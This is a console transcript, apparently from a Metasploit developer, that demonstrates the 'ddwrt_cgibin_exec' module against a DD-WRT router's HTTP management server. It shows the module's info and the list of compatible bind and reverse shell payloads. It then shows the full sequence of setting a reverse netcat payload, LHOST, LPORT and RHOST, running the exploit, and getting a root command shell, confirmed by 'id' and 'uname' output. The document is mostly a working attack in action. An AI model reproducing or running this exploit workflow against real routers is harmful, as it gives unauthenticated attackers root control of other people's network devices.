msf3$ svn up
A    modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb
Updated to revision 6852.
hdm@vorpal:/downloads/msf19$ ./msfconsole 

                |                    |      _) |   
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __| 
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |   
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| 
                              _|                   


       =[ msf v3.3-dev
+ -- --=[ 401 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 176 aux

msf > use exploit/linux/http/ddwrt_cgibin_exec 
msf exploit(ddwrt_cgibin_exec) > info 

       Name: DD-WRT HTTP Daemon Arbitrary Command Execution
    Version: 6852
   Platform: Unix
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name              
  --  ----              
  0   Automatic Target  

Basic options:
  Name   Current Setting  Required  Description         
  ----   ---------------  --------  -----------         
  RHOST  192.168.0.10     yes       The target address  
  RPORT  80               yes       The target port     

Payload information:
  Space: 1024

Description:
  This module abuses a metacharacter injection vulnerability in the 
  HTTP management server of wireless gateways running DD-WRT. This 
  flaw allows an unauthenticated attacker to execute arbitrary 
  commands as the root user account.

References:
  http://www.securityfocus.com/bid/35742
  http://www.milw0rm.com/exploits/9209

msf exploit(ddwrt_cgibin_exec) > show payloads 

Compatible payloads
===================

   Name                       Description                                      
   ----                       -----------                                      
   cmd/unix/bind_netcat       Unix Command Shell, Bind TCP (via netcat -e)     
   cmd/unix/bind_perl         Unix Command Shell, Bind TCP (via perl)          
   cmd/unix/bind_ruby         Unix Command Shell, Bind TCP (via Ruby)          
   cmd/unix/generic           Unix Command, Generic command execution          
   cmd/unix/reverse           Unix Command Shell, Double reverse TCP (telnet)  
   cmd/unix/reverse_bash      Unix Command Shell, Reverse TCP (/dev/tcp)       
   cmd/unix/reverse_netcat    Unix Command Shell, Reverse TCP (via netcat -e)  
   cmd/unix/reverse_perl      Unix Command Shell, Reverse TCP (via perl)       
   cmd/unix/reverse_ruby      Unix Command Shell, Reverse TCP (via Ruby)       
   generic/shell_bind_tcp     Generic Command Shell, Bind TCP Inline           
   generic/shell_reverse_tcp  Generic Command Shell, Reverse TCP Inline        

msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.0.139 
LHOST => 192.168.0.139
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444 
LPORT => 4444
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.0.10
RHOST => 192.168.0.10
msf exploit(ddwrt_cgibin_exec) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 1 opened (192.168.0.139:4444 -> 192.168.0.10:2057)

id
uid=0(root) gid=0(root)
uname -a
Linux wifi1 2.4.36 #308 Sun Jul 27 16:11:05 CEST 2008 mips unknown